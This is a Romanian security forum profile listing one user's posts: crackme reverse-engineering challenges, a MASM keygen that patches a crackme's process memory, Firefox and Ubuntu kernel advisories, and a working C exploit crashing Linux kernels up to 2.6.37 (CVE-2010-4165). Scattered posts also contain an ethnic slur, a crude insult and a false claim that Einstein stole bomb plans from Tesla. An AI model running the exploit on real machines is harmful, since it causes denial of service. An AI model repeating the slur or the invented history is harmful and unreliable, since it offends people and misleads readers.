Jump to content

Flubber

Active Members
  • Posts

    1765
  • Joined

  • Last visited

  • Days Won

    11

Posts posted by Flubber

  1. salut,

    motivul pt care is aici e simplu: plictisit si increzator in cunostintele mele si doritor de a invata

    motivul pt care nu o sa mai fiu aici :banui ca o sa il zica ala dintre voi care o sa mio traga la gioale... io inca nu-l stiu...nici nu cred ca o sa apuc sa-mi dau seama :P:D

    respect

    Salut, încearc? s? nu te mai bâlbâi. Folose?te butonul "EDIT".

  2. 1) de ce e asa de greu de crezut ca sunt fata? sunteti misogini ?

    2) 699 vine de la cu totul altceva decat va asteptati voi

    3) as prefera sa ma ajute cineva care nu e obsedat sexual

    4) credeam ca e un forum serios , insa MAJORITATEA imi arata contrariul

    5) Majoritatea celor care au postat aici dau dovada de proasta crestere avand in vedere ca eu nu am insultat pe nimeni

    Sa ma pis pe tine.

    Pazea ca vine si Pax!

  3. NOKAS (este pe filelist, aia vorbesc in norvegiana dar ai subtitrarea in engleza inclusa in torrent, nu am vazut vreuna in romana, iar eu nu am putut face, cea in engleza a fost facuta cu un soft si este "encodata", nu am stat sa o fac manual dupa cum apare pe ecran; dar nu cred ca este o problema ca e in limba engleza)

    Nokas (2010) - IMDb

  4. pt virusz: de ce mi-ai sters postul cu keygenul de la primul crackme?

    l-am pus acolo pt. ca cei care nu stiu cum sa-l rezolve sa vada cam cum ar trebui sa arate serialele. de aceea am inclus si codul sursa. sa stii ca nu-i inveti pe oameni nimic daca nu le si arati cum ai reusit sa ajungi la rezultatul ala. oricum muncisem la keygenul ala si nu mi-a cazut prea bine cand am vazut postul sters. si ca sa imi intaresc argumentele: chiar daca userii postau seriale precum ai cerut, tu nu aveai cum sa verifici validitatea lor, nestiind usernameul windowsului lor

    te stimez pt timpul pe care-l dedici facand aceste crackme-uri

    Din observatiile mele, s-a cam "dat inapoi" forumul (probabil s-a revenit la un backup anterior din diferite motive).

    Am postat keygen-ul facut de tine in thread-ul corespunzator: http://rstcenter.com/forum/32359-crackme-vrs1.rst#post220177

    Stima!

  5. self keygen-ul lui sulea

    Codul sursa ASM:


    .386
    .model flat,stdcall
    option casemap:none

    DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD
    EnumChildWindowx proto: DWORD, :DWORD

    include \masm32\include\windows.inc
    include \masm32\include\user32.inc
    include \masm32\include\kernel32.inc
    includelib \masm32\lib\user32.lib
    includelib \masm32\lib\kernel32.lib

    .data
    DlgName db "crackme",0


    clasa db "TForm1",0
    winn db "Crackme (vrs.1)",0
    editul db "TEdit",0



    AppName db "demonstratie selfkeygening",0

    bytes_cc db 50h, 8Dh, 45h, 0C4h, 8bh, 00h, 89h, 05h, 0DCh, 3Eh, 47h, 00h, 58h, 0FFh, 75h, 0C4h, 68h, 0DCh, 43h, 45h, 00h
    db 0E9h, 6fh, 04h, 0FEh, 0FFh

    bytes_jump db 0E9h, 7Ah, 0FBh, 01h, 00h, 90h, 90h, 90h

    totalul dd 26
    totalul1 dd 26+100
    totalul2 dd 8
    offset_cc dd 473ef4h
    offset_cc1 dd 473ef4h-50
    offset_cc2 dd 454375h
    adresaa dd 473edch
    buffer1 db 4 dup(0)
    buffer2 db 20 dup(0)

    .data?
    hInstance HINSTANCE ?
    CommandLine LPSTR ?
    buffer db 10 dup(?)

    hform dd ?
    oldaccess dd ?
    hProcess dd ?
    pid dd ?
    bytes_written dd ?
    adresaa2 dd ?

    edit_handle dd ?

    .const
    IDC_BUTTON equ 3001
    IDC_EXIT equ 3002



    .code
    start:
    invoke GetModuleHandle, NULL
    mov hInstance,eax
    invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL
    invoke ExitProcess,eax

    DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    .IF uMsg==WM_CLOSE
    invoke SendMessage,hWnd,WM_COMMAND,IDC_EXIT,0
    .elseif uMsg==WM_TIMER
    Invoke ReadProcessMemory, hProcess, adresaa, addr buffer1, 4, NULL
    lea eax,buffer1
    mov eax,[eax]
    push eax
    pop adresaa2
    add adresaa2,10h

    Invoke ReadProcessMemory, hProcess, adresaa2, addr buffer2, 18, NULL
    invoke SendMessage, edit_handle, WM_SETTEXT, 0, ADDR buffer2

    .ELSEIF uMsg==WM_COMMAND
    mov eax,wParam
    mov edx,wParam
    shr edx,16
    .if dx==BN_CLICKED
    .IF ax==IDC_BUTTON

    invoke FindWindow,addr clasa,addr winn
    mov hform, eax
    .if hform != 0
    invoke EnumChildWindows, hform, ADDR EnumChildWindowx, NULL
    Invoke GetWindowThreadProcessId, hform, ADDR pid
    Invoke OpenProcess,PROCESS_VM_READ + PROCESS_VM_WRITE + PROCESS_VM_OPERATION, 0, pid
    mov hProcess,eax
    Invoke VirtualProtectEx, hProcess, offset_cc1, totalul1, PAGE_EXECUTE_READWRITE, addr oldaccess
    invoke WriteProcessMemory,hProcess,offset_cc, addr bytes_cc, totalul, addr bytes_written
    Invoke VirtualProtectEx, hProcess, offset_cc2, totalul2, PAGE_EXECUTE_READWRITE, addr oldaccess
    invoke WriteProcessMemory,hProcess,offset_cc2, addr bytes_jump, totalul2, addr bytes_written
    invoke SetTimer,hWnd,1,1000,NULL

    .endif

    .ELSEIF ax==IDC_EXIT

    invoke EndDialog, hWnd,NULL

    .ENDIF
    .ENDIF
    .ELSE
    mov eax,FALSE
    ret
    .ENDIF
    mov eax,TRUE
    ret
    DlgProc endp

    EnumChildWindowx proc hhWin:DWORD,lParam:DWORD


    invoke GetClassName,hhWin,addr buffer,10
    invoke lstrcmpi,addr buffer,addr editul
    cmp eax,0
    jne @F

    push hhWin
    pop edit_handle

    @@: mov eax,1

    ret
    EnumChildWindowx endp


    end start

  6. ATENTIE! O adaugare si o corectare, pentru a intelege toata lumea, nu am cerut special patch, in sensul plin al cuvantului (este bun si acesta), ci si executabilul original cu modificarile aduse (fie de ollydbg), unde la orice input, da mesajul de win.

    Scuzele de rigoare daca v-am indus in eroare.

    Nimic special, doar unul basic.

    rdme.txt:

    Bypass[01]

    Nivel[usor]
    Cunostinte necesare[asm - basic, debugger si debugging]


    ** Se cere:
    ***********
    1] Bypass pentru a afisa mesajul corespunzator (patch -- .exe);

    2] Indata ce punctul unu este indeplinit, se cere o explicatie (cum s-a ajuns la rezultat),
    precum si explicarea (in mare) a codului ASM (ce actiuni importante s-au luat de catre CPU
    pentru a ajunge la acel rezultat);

    (optional) 3] Sa se afle user si parola.


    ! Parola de la fisierul "1.c" este cea de la crackme.

    // Have phun.

    Unde "!" se poate considera hint.

    Download: Download 1_crackme.zip from Sendspace.com - send big files the easy way

    Incercati sa nu postati aici rezolvarea, eventual prin PM.

    P.S.: M*ie aluia care face bruteforce pe *.c file pentru a afla rezolvarea.

    Edit:

    Primul care sparge gheata este daatdraqq. Felicitari!

    Edit2:

    Al doilea ce darama challenge-ul este sulea.

    Edit3:

    Al treilea ce darama challenge-ul este virusz.


    1st. [B]daatdraqq[/B];
    2nd. [B]sulea[/B];
    3rd. [B]virusz[/B];

  7. felicitari :) suport pentru proxy?

    Intrucat, sickness si-a uitat parola de la cont :)) (rofl), m-a rugat sa transmit aici mesajul sau, tie.

    suportul proxy nu este necesar; un fuzzer doar trimite date unui program pe care il analizezi intr-un debugger
  8. Sunt multi frate , peste 1 miliard trebuie sa manance si aia ceva . Imi pare rau pt astia ce s-au uitat la video si au acasa cate un animal si au grija de el si tin la el ca la un adevarat prieten . Cate cazuri nu sunt in care cainele salveaza viata stapanului

    Nu e vorba numai de asta, e vorba si de societate, e vorba despre inteligenta fiecarui individ, se spune ca atunci cand foamea iti ajunge la os si se resimte cel mai tare, omul isi uita toate 'naravurile' si activeaza singurele instincte de supravietuire, atunci nu te mai uiti ca-i pisica sau caine, dar chiar si asa, chiar si intr-o societate bolnava ce poate promoveaza asa ceva, direct sau indirect, nu te poate lasa constiinta in primul rand frate, sentimentul, gandul ca poti fi tu in locul aluia, chiar daca ti-e foame de iti vine sa mananci pamant, nu recurgi la asa ceva, da-te-n mortii ma-tii de chinez, ce om trebuie sa fi sa faci asa ceva? Cu siguranta psihopat!

  9. Folosindu-se de Spike fuzzer, sickfuzz este un script developat de sickness in Python, pentru a testa diferite vulnerabilitati in aplicatii, trimitandu-le diferite date pe un port pana ce se iveste un crash (a.k.a. BoF); w/e.

    # What is fuzzing?

    So in short fuzzing is a technique used to discover coding errors in software, so it sends the specific port,app,etc. unexpected data. For example if we have a small application that asks us for a number between 1 and 10 and then divides our number to 2, what will happen if we enter “%Io&6….” ? (It’s not the best example I know but I think you get the picture).

    Video: http://blip.tv/play/hdkFgqflYwA%2Em4v

    Download: Downloads - sickfuzz - Project Hosting on Google Code

    Mai multe informatii aici: sickfuzz – HTTP fuzzer. ihasomgsecurityskills

  10. Vina e a oamenilor de stiinta..pentru ca isi fac publice descoperirile.Ei stiu ca lucreaza in subordine si ca guvernul le studiaza fiecare miscare si gestioneaza banii pentru fiecare proiect.Inventiilor lor ajung mereu pe mana celor de sus.Oamenii de stiinta sunt ca si hackerii:geniali insa toti au gura sparta.(mda,faima si faptul ca ai realizat ceva nu are dreptul sa ti-o ia nimeni.)Cand descoperi ceva ce poate fute o intreaga planeta pur si simplu ar trebui sa taci de dragul stiintei,nu sa deschizi pliscul si sa speri ca o sa aiba demnitate si etica si sa nu se faca abuz de tehnologie.

    Foarte bine spus, iar Einstein a realizat asta dupa ce a vazut efectele bombei atomice pe mana cui nu trebuia. Cei drept (din cunostintele mele), Einstein a furat planurile respective de la Nicola Tesla cu o saptamana in urma (vazandu-i schitele si notitele). Ei fiind parteneri strans legati, as putea spune o prostie, poate ma insel, dar asa cum a spus si wildchild, pe scurt "Don't give weapons to the crazy monkeys!"

    Traiasca vinul rosu!

  11. ^ subscriu.

    Hint: Nu merge ollydbg, dar merge altceva (mai bun si cu mai mult gust -- asta depinde de fiecare) incepe cu "I" si se termina in "Pro". Pe langa asta, sulea si phantomas90 au spus destul. O groaza de hint-uri pentru skiddies.

  12. Asa ceva nu ajuta cu nimic, tot ce trebuie dat sunt indicii pentru newbies, rezolvarile directe nu te aduc nicaieri si nu inveti nimic din ele, eventual te consulti cu rezolvarile postate pe internet dupa ce ai rezolvat misiunea personal (asa inveti ceva nou, recapitulezi sau poate vezi tehnici noi). Crede-ma, am procedat la fel (in 40% din misiuni) si nu am invatat nimic (aproape).

  13. Zero Day Initiative despre care am postat pe forum, dar aparent nu mai este thread-ul.

    ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability


    ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability

    [URL="http://www.zerodayinitiative.com/advisories/ZDI-11-103"]Zero Day Initiative[/URL]

    March 2, 2011

    -- CVE ID:
    CVE-2011-0055

    -- CVSS:
    9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

    -- Affected Vendors:
    Mozilla

    -- Affected Products:
    Mozilla Firefox

    -- TippingPoint(TM) IPS Customer Protection:
    TippingPoint IPS customers have been protected against this
    vulnerability by Digital Vaccine protection filter ID 10843.
    For further product information on the TippingPoint IPS, visit:

    [URL="http://www.tippingpoint.com/"]http://www.tippingpoint.com[/URL]
    [B]
    -- Vulnerability Details:[/B]
    This vulnerability allows remote attackers to execute arbitrary code on
    vulnerable installations of Firefox. User interaction is required to
    exploit this vulnerability in that the target must visit a malicious
    page or open a malicious file.

    The specific flaw exists within js3250.dll. In the JSON.stringify() call
    chain js_HasOwnProperty() is called with an invalid pointer. The pointer
    becomes invalid due to being unrooted and garbage collection occurring.
    Dereferecing of this pointer allows a remote attacker to execute
    arbitrary code in the context of the user running the browser.

    -- Vendor Response:
    Mozilla has issued an update to correct this vulnerability. More
    details can be found at:

    [URL="http://www.mozilla.org/security/announce/2011/mfsa2011-03.html"]MFSA 2011-03: Use-after-free error in JSON.stringify[/URL]

    -- Disclosure Timeline:
    2010-12-01 - Vulnerability reported to vendor
    2011-03-02 - Coordinated public release of advisory

    -- Credit:
    This vulnerability was discovered by:
    * regenrecht

    Sursa: Full Disclosure: ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability

  14. Deja s-a facut upgrade-ul la 2.6.32-29. Cine are Ubuntu, update && upgrade.

    [uSN-1080-1] Linux kernel vulnerabilities (Ubuntu 10.04 LTS)


    Details follow:

    Thomas Pollet discovered that the RDS network protocol did not check
    certain iovec buffers. A local attacker could exploit this to crash the
    system or possibly execute arbitrary code as the root user. (CVE-2010-3865)

    Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did
    not correctly clear kernel memory. A local attacker could exploit this to
    read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)

    Vasiliy Kulikov discovered that the Linux kernel sockets implementation did
    not properly initialize certain structures. A local attacker could exploit
    this to read kernel stack memory, leading to a loss of privacy.
    (CVE-2010-3876)

    Vasiliy Kulikov discovered that the TIPC interface did not correctly
    initialize certain structures. A local attacker could exploit this to read
    kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)

    Nelson Elhage discovered that the Linux kernel IPv4 implementation did not
    properly audit certain bytecodes in netlink messages. A local attacker
    could exploit this to cause the kernel to hang, leading to a denial of
    service. (CVE-2010-3880)

    It was discovered that multithreaded exec did not handle CPU timers
    correctly. A local attacker could exploit this to crash the system, leading
    to a denial of service. (CVE-2010-4248)

    Krishna Gudipati discovered that the bfa adapter driver did not correctly
    initialize certain structures. A local attacker could read files in /sys to
    crash the system, leading to a denial of service. (CVE-2010-4343)

    Tavis Ormandy discovered that the install_special_mapping function could
    bypass the mmap_min_addr restriction. A local attacker could exploit this
    to mmap 4096 bytes below the mmap_min_addr area, possibly improving the
    chances of performing NULL pointer dereference attacks. (CVE-2010-4346)

    It was discovered that the ICMP stack did not correctly handle certain
    unreachable messages. If a remote attacker were able to acquire a socket
    lock, they could send specially crafted traffic that would crash the
    system, leading to a denial of service. (CVE-2010-4526)

    Dan Rosenberg discovered that the OSS subsystem did not handle name
    termination correctly. A local attacker could exploit this crash the system
    or gain root privileges. (CVE-2010-4527)

    Dan Carpenter discovered that the Infiniband driver did not correctly
    handle certain requests. A local user could exploit this to crash the
    system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)

    [uSN-1081-1] Linux kernel vulnerabilities (Ubuntu 10.10)


    ATTENTION: Due to an unavoidable ABI change the kernel updates have
    been given a new version number, which requires you to recompile and
    reinstall all third party kernel modules you might have installed. If
    you use linux-restricted-modules, you have to update that package as
    well to get modules which work with the new kernel version. Unless you
    manually uninstalled the standard kernel metapackages (e.g. linux-generic,
    linux-server, linux-powerpc), a standard system upgrade will automatically
    perform this as well.

    Details follow:

    It was discovered that KVM did not correctly initialize certain CPU
    registers. A local attacker could exploit this to crash the system, leading
    to a denial of service. (CVE-2010-3698)

    Thomas Pollet discovered that the RDS network protocol did not check
    certain iovec buffers. A local attacker could exploit this to crash the
    system or possibly execute arbitrary code as the root user. (CVE-2010-3865)

    Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did
    not correctly clear kernel memory. A local attacker could exploit this to
    read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)

    Vasiliy Kulikov discovered that the Linux kernel sockets implementation did
    not properly initialize certain structures. A local attacker could exploit
    this to read kernel stack memory, leading to a loss of privacy.
    (CVE-2010-3876)

    Vasiliy Kulikov discovered that the TIPC interface did not correctly
    initialize certain structures. A local attacker could exploit this to read
    kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)

    Nelson Elhage discovered that the Linux kernel IPv4 implementation did not
    properly audit certain bytecodes in netlink messages. A local attacker
    could exploit this to cause the kernel to hang, leading to a denial of
    service. (CVE-2010-3880)

    Dan Rosenberg discovered that the ivtv V4L driver did not correctly
    initialize certian structures. A local attacker could exploit this to read
    kernel stack memory, leading to a loss of privacy. (CVE-2010-4079)

    Dan Rosenberg discovered that the semctl syscall did not correctly clear
    kernel memory. A local attacker could exploit this to read kernel stack
    memory, leading to a loss of privacy. (CVE-2010-4083)

    It was discovered that multithreaded exec did not handle CPU timers
    correctly. A local attacker could exploit this to crash the system, leading
    to a denial of service. (CVE-2010-4248)

    Nelson Elhage discovered that Econet did not correctly handle AUN packets
    over UDP. A local attacker could send specially crafted traffic to crash
    the system, leading to a denial of service. (CVE-2010-4342)

    Tavis Ormandy discovered that the install_special_mapping function could
    bypass the mmap_min_addr restriction. A local attacker could exploit this
    to mmap 4096 bytes below the mmap_min_addr area, possibly improving the
    chances of performing NULL pointer dereference attacks. (CVE-2010-4346)

    Dan Rosenberg discovered that the OSS subsystem did not handle name
    termination correctly. A local attacker could exploit this crash the system
    or gain root privileges. (CVE-2010-4527)

    Dan Carpenter discovered that the Infiniband driver did not correctly
    handle certain requests. A local user could exploit this to crash the
    system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)

    Cat despre Linux Kernel <= 2.6.37:


    /* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)
    * =======================================================
    * A divide by 0 error occurs in tcp_select_initial_window
    * when processing user supplied TCP_MAXSEG facilitating a
    * local denial-of-service condition (kernel oops!) in all
    * Linux Kernel 2.6.x branch (2.6.37 & below). This issue
    * can be triggered easily with a call to setsockopt() on
    * a listening network socket and then establishing a TCP
    * connection to the awaiting socket.
    *
    * -- prdelka
    *
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netinet/tcp.h>


    int main() {
    int optval, optlen, ret, sd, sd2, pid;
    char *host = "localhost";
    struct sockaddr_in locAddr;
    struct sockaddr_in servAddr;
    struct sockaddr_in dstAddr;
    printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n");
    sd = socket(AF_INET, SOCK_STREAM, 0);
    memset(&servAddr,0,sizeof(servAddr));
    memset(&dstAddr,0,sizeof(dstAddr));
    servAddr.sin_family = AF_INET;
    servAddr.sin_port = htons(60000);
    servAddr.sin_addr.s_addr = INADDR_ANY;
    dstAddr.sin_family = AF_INET;
    inet_aton("127.0.0.1", &dstAddr.sin_addr);
    dstAddr.sin_port = htons(60000);
    if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){
    printf("[ Cannot bind listener service\n");
    exit(-1);
    }
    listen(sd,4);
    optval = 12;
    ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));
    if(ret==0)
    {
    printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n");
    int sin_size = sizeof(struct sockaddr_in);
    switch(pid = fork())
    {
    case 0:
    sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);
    sleep(3);
    default:
    sd2 = socket(AF_INET, SOCK_STREAM, 0);
    connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));
    sleep(3);
    }
    }
    printf("[ System is patched, no dreams for this prince\n");
    return 0;
    }

    Surse (in ordine):

    1] Full Disclosure: [uSN-1080-1] Linux kernel vulnerabilities

    2] Full Disclosure: [uSN-1081-1] Linux kernel vulnerabilities

    3] Linux Kernel <= 2.6.37 Local Kernel Denial of Service

  15. Pune mai intai unele mai simple...sau puteai sa scrii la hint: .NET.. macar un indiciu.

    Ca l-am desfacut si nu avea nici o logica, nu gaseam input-uri, functiile nu semanau cu cele din win32.

    Am vazut si rezolvarea, interesant.

    Subscriu.

    Deasemenea, la 6 dimineata imi storceam creierii si tot ce am putut scoate a fost:


    CrackMe-rstcenter#PictureBox1.ImagePictureBox1Form2OStraduieste-te mai mult , pentru ca ...Form3Ai reusit !#CrackMe.Resou?rces


    EAX=0B71B600
    Stack SS:[0012E4C0]=01692678, (ASCII "îþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþEAX=0B71B600

    Niste notite idioate, dar am observat ceva si tot incercasem niste chestii aiurea:

    CrackMe[B]-rstcenter[/B]

    mai exact

    -rstcenter

    . Daca incepeam cu trial si error (daatdraq-rstcenter // gigiparleala-rstcenter etc) poate reuseam ceva.

    Multumiri pentru crackme, cei drept, trebuia o analiza mai in detaliu a executabilului si poate imi dadeam seama ca a fost facut in .NET.

    P.S.: Notitele au fost realizate in urma introducerii (bleah, suna aiurea) a executabilului in notepad (da, notepad ftw) si in hex editor -- a se vedea 'Form3 Ai reusit!', speram la un bypass catre Form3.

×
×
  • Create New...